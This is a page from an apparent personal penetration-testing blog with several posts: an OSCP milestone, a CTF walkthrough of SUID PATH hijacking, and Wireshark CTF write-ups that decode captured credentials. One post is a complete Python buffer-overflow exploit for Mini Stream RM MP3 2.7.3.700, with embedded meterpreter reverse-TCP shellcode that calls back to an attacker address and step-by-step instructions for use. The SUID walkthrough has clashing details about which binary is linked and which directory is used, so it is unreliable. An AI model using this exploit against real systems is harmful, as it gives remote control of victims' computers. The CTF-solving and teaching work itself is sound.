Saturday, 1 July 2017

OSCP Certified!!

Standard
The OSCP Journey is one of the memorable journey I had till now ... It was a journey where I went through "Pain" and "Sufferance".

I registered for  the course in the month on March and I took 60 days of Lab.

After 3 months of continuous effort I decided to sit for the exam on 23rd June

I had my exams on 23rd June and I got my results on 27th June



Monday, 19 June 2017

Simple PHP Web Shells

Standard





This tutorial should be used for educational purpose only. I won't be responsible if you misuse this techniques and get yourself in trouble.
During pentest activities I have noticed that there are multiple ways to execute system commands in php. This comes handy if something is blocked / blacklisted. Here are few simple one liner web shells

Saturday, 3 June 2017

Linux Privilege Escalation : SUID Binaries

Standard
After my OSCP Lab days are over I decided to do a little research and learn more on Privilege Escalation as it is my weak area.So over some series of blog post I am going to share with you some information of what I have learnt so far. The methods mentioned over here are not my own. This is something what I have learnt by reading articles, blogs and solving CTFs

SUID - Set User ID

The binaries which has suid enabled, runs with elevated privileges. Suppose you are logged in as non root user, but this suid bit enabled binaries can run with root privileges.

How does a SUID Bit enable binary looks like ?

-r-sr-x---  1 hack-me-bak-cracked hack-me-bak         7160 Aug 11  2015 bak


How to find all the SUID enabled binaries ?

hack-me-bak2@challenge02:~$ find / -perm -u=s 2>/dev/null

/bin/su
/bin/fusermount
/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/sudoedit
/usr/bin/mtr
/usr/bin/at
/usr/sbin/uuidd
/usr/sbin/pppd
/challenge/hack-me/bak2/bak2

Can this be used to elevate the privileges ?

Lets have a look at the source code

#include <stdlib.h>
#include <stdio.h>

/* gcc -m32 -o bak bak.c */

int main(void)
{
        system("ls /challenge/hack-me/bak/.passwd");
        return 0;
}

If I look at the permission of .passwd file , it is

-r--r-----  1 hack-me-bak-cracked hack-me-bak-cracked   14 Feb  8  2012 .passwd

You can see that I dont have any rights to view the file

No I am going to create a directory in temp and create a symbolic link to /bin/cat as ls and then export the PATH to that directory.


hack-me-bak@challenge02:/tmp/hack$ ln -s /bin/sh ls

hack-me-bak@challenge02:/tmp/suid$ export PATH=/tmp/suid

hack-me-bak@challenge02:/tmp/suid$ cd ~

hack-me-bak@challenge02:~$ ./bak

xh9ws32d

What did just happen ?

I created a symbolic link of  the /bin/cat and named it as "ls" and then I added the PATH to /tmp/suid. Now when the binary will be executed , it will look for "ls" in the PATH. So my PATH now points to "/tmp/suid". And the "ls" points to /bin/cat

So when the c executable executes the line ls /challenge/hack-me/bak/.passwd, it does the following /bin/cat  /challenge/hack-me/bak/.passwd

But as it is a SUID binary, it will run with elevated privileges, so I can read the contents of the .passwd file even if I did not have enough privileges.




Thursday, 1 June 2017

Mini Stream RM MP3 2.7.3.700 Buffer Overflow

Standard
# Exploit Title: Mini Stream RM MP3 2.7.3.700 Buffer Overflow
# Date: 31.05.2017
# Exploit Author: Dibyendu Sikdar (dibsyhex)
# Vendor Homepage: http://www.downloadsource.net/5318/Mini-stream-RM-MP3-Converter-Easy-RM-to-MP3-Converter/
# Software Link: https://www.exploit-db.com/apps/1bbf03ec57b1ad30970362518e073215-Mini-streamRM-MP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 Home Basic 32 bit

# Save the file as exploit.py
# Run the code as python exploit.py
# It will create a file with the exploit called play.m3u
# Run a meterpreter handler in attacker system
# Start the application. Select load. Select filetype as playlist. Open the play.m3u file

#EIP = 1001B058  [ using PUSH ESP, RETN ]

head = "A" * 35055
nop = "\x90" * 60
eip = "\x58\xB0\x01\x10"

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=443 -f c -b "\x00\x0a\x0d"

shell = ("\xd9\xc0\xd9\x74\x24\xf4\x5f\xb8\xad\xaf\xba\x08\x31\xc9\xb1"
"\x54\x31\x47\x18\x03\x47\x18\x83\xef\x51\x4d\x4f\xf4\x41\x10"
"\xb0\x05\x91\x75\x38\xe0\xa0\xb5\x5e\x60\x92\x05\x14\x24\x1e"
"\xed\x78\xdd\x95\x83\x54\xd2\x1e\x29\x83\xdd\x9f\x02\xf7\x7c"
"\x23\x59\x24\x5f\x1a\x92\x39\x9e\x5b\xcf\xb0\xf2\x34\x9b\x67"
"\xe3\x31\xd1\xbb\x88\x09\xf7\xbb\x6d\xd9\xf6\xea\x23\x52\xa1"
"\x2c\xc5\xb7\xd9\x64\xdd\xd4\xe4\x3f\x56\x2e\x92\xc1\xbe\x7f"
"\x5b\x6d\xff\xb0\xae\x6f\xc7\x76\x51\x1a\x31\x85\xec\x1d\x86"
"\xf4\x2a\xab\x1d\x5e\xb8\x0b\xfa\x5f\x6d\xcd\x89\x53\xda\x99"
"\xd6\x77\xdd\x4e\x6d\x83\x56\x71\xa2\x02\x2c\x56\x66\x4f\xf6"
"\xf7\x3f\x35\x59\x07\x5f\x96\x06\xad\x2b\x3a\x52\xdc\x71\x52"
"\x97\xed\x89\xa2\xbf\x66\xf9\x90\x60\xdd\x95\x98\xe9\xfb\x62"
"\xdf\xc3\xbc\xfd\x1e\xec\xbc\xd4\xe4\xb8\xec\x4e\xcd\xc0\x66"
"\x8f\xf2\x14\x12\x8a\x64\x57\x4b\x8a\xf6\x3f\x8e\xb3\xf7\x04"
"\x07\x55\xa7\x2a\x48\xca\x07\x9b\x28\xba\xef\xf1\xa6\xe5\x0f"
"\xfa\x6c\x8e\xa5\x15\xd9\xe6\x51\x8f\x40\x7c\xc0\x50\x5f\xf8"
"\xc2\xdb\x6a\xfc\x8c\x2b\x1e\xee\xf8\x4d\xe0\xee\xf8\xe7\xe0"
"\x84\xfc\xa1\xb7\x30\xfe\x94\xf0\x9e\x01\xf3\x82\xd9\xfd\x82"
"\xb2\x92\xcb\x10\xfb\xcc\x33\xf5\xfb\x0c\x65\x9f\xfb\x64\xd1"
"\xfb\xaf\x91\x1e\xd6\xc3\x09\x8a\xd9\xb5\xfe\x1d\xb2\x3b\xd8"
"\x69\x1d\xc3\x0f\xea\x5a\x3b\xcd\xce\xc2\x54\x2d\x4e\xf3\xa4"
"\x47\x4e\xa3\xcc\x9c\x61\x4c\x3d\x5c\xa8\x05\x55\xd7\x3c\xe7"
"\xc4\xe8\x15\xa9\x58\xe8\x99\x72\x8c\x67\x5e\x85\xb1\x89\x63"
"\x53\x88\xff\xa4\x67\xaf\xf0\x9f\xca\x86\x9a\xdf\x59\xd8\x8e")

f = open("play.m3u","w")
payload = head+eip+nop+shell+"C"*200
f.write(payload)
f.close()



Saturday, 22 November 2014

Packet Analysis 4 : Bacic HTTP Authentication

Standard
 "This tutorial should be used for educational purpose only. I won't be responsible if you misuse this techniques and get yourself in trouble.The pcap file used in this example is from a CTF challenge "


Protocol - Hypertext Transfer Protocol - Used for exchanging or transfer hypertext 
Connection Type - TCP 



So the challenge scenario is something like this . 

Find the username and passport for the bacis http authentication.

So to solve this challenge I will use Wireshark. First I load the pcap file in Wireshark.


In the filter bar I will write "http" so that it displays the packets matching the HTTP protocol only.



Now we will analyze the first capture and right click on it and select "Follow TCP Stream". After analyzing the we will find that the page is protected by Basic Http Authentication. 



GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.1
Connection: Keep-Alive
Authorization: Basic YWRtaW5pc3RyYXRvcjpwQHNzdzByZA==


So if we look carefully at the http packets we have 2 response codes 
401 Access Denied 
200 Okay .

200 Okay means "Successfully Loaded the Page". So lets use "Follow TCP Stream" on it.



GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.1
Connection: Keep-Alive
Authorization: Basic YWRtaW5pc3RyYXRvcjpwQHNzdzByZA==


HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 08 Apr 2010 19:43:33 GMT
Content-Length: 1270
Content-Type: text/html
Set-Cookie: ASPSESSIONIDGGQGGGYU=MNHDPIBDBHJEPFGBCFGKPKIJ; path=/
Cache-control: private

So we need to decode the information of HTTP Authentication . It is generally encrypted in base64 . So we need to decrypt it 
YWRtaW5pc3RyYXRvcjpwQHNzdzByZA==

For HTTP Authetication the username and password is joined using a " : " and encrypted using base64. So on decrypting we get


Username = administrator
Password  = p@ssw0rd


Friday, 21 November 2014

Packet Analysis 3 : SMTP Authentication

Standard
 "This tutorial should be used for educational purpose only. I won't be responsible if you misuse this techniques and get yourself in trouble.The pcap file used in this example is from a CTF challenge "


Protocol - Simple Mail Transfer Protocol - Used for sending emails
Connection Type - TCP
Commonly Used Commands : HELO , MAIL , RCPT , 

So the challenge scenario is something like this . 

Find the username and password of the SMTP authentication.

So to solve this challenge I will use Wireshark. First I load the pcap file in Wireshark.




In the filter bar I will write "smtp" so that it displays the packets matching the SMTP protocol only.

In SMTP we need to authenticate before we can send any mail . After applying the filter we can see the details of the SMTP . We can find the info by looking at the output or we can also get the details by following the TCP stream at "Authentication Successful" . So I will right click on that and select "Follow TCP Stream".



We find this result 

AUTH LOGIN
334 VXNlcm5hbWU6
QXVkaQ==
334 UGFzc3dvcmQ6
MTIzNGFk

The authentications is encoded in base64 . So we will decode the information QXVkaQ== and MTIzNGFk

QXVkaQ== base64 decoded is Audi
MTIzNGFk base64 decoded is 1234ad

Wednesday, 24 September 2014

Packet Analysis 2 : SMTP Details

Standard
CAUTION

    "This tutorial should be used for educational purpose only. I won't be responsible if you misuse this techniques and get yourself in trouble.The pcap file used in this example is from a CTF challenge "


Protocol - Simple Mail Transfer Protocol - Used for sending emails
Connection Type - TCP
Commonly Used Commands : HELO , MAIL , RCPT , 

So the challenge scenario is something like this . 

Find the senders email address and the recipients email address of the SMTP transfer out of the pcap file .

So to solve this challenge I will use Wireshark. First I load the pcap file in Wireshark.



Now my objective is to find out the senders and receivers emails. So in the filter bar I will write "smtp" so that it displays the packets matching the SMTP protocol only.





In SMTP we need to authenticate before we can send any mail . After applying the filter we can see the details of the SMTP . We can find the info by looking at the output or we can also get the details by following the TCP stream at "Authentication Successful" . So I will right click on that and select "Follow TCP Stream".





By analyzing the packet we can find the senders and receivers email id